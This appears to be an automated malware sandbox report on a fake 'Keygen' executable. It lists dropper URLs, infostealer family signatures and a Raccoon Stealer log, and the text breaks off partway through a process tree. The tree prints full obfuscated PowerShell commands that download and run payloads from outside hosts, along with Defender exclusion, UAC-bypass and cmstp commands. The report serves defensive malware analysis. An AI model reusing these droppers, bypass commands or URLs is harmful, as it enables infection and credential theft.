Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (4).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:13:19 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (482 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 58 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (4).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (4).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\56C7.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (4).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1400
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\56C7.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1892
          • C:\Users\Public\xks.exe
            "C:\Users\Public\xks.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2560
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2636
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2848
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2848 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\442368351881896\\* & exit
                  8⤵
                    PID:2808
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2848
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:856
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2676
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2824
              • C:\Users\Public\xks.exe
                "C:\Users\Public\xks.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2744
                • C:\Users\Admin\AppData\Local\Temp\1JypHZLFco.exe
                  "C:\Users\Admin\AppData\Local\Temp\1JypHZLFco.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2996
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\1JypHZLFco.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2344
                • C:\Users\Admin\AppData\Local\Temp\LszKH5wf1v.exe
                  "C:\Users\Admin\AppData\Local\Temp\LszKH5wf1v.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:1620
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2304
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2632
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:2816
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:2364
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:2256
                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                          8⤵
                            PID:580
                        • C:\Users\Admin\AppData\Local\Temp\K5EVU8aSGB.exe
                          "C:\Users\Admin\AppData\Local\Temp\K5EVU8aSGB.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:2944
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\gajmvzka.inf
                            8⤵
                              PID:944
                          • C:\Users\Admin\AppData\Local\Temp\xrMCiHaxn0.exe
                            "C:\Users\Admin\AppData\Local\Temp\xrMCiHaxn0.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2740
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2812
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xks.exe"
                            7⤵
                              PID:2452
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:1636
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\56C7.tmp\m1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1640
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1996
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 1
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1596
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\56C7.tmp\b.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1196
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
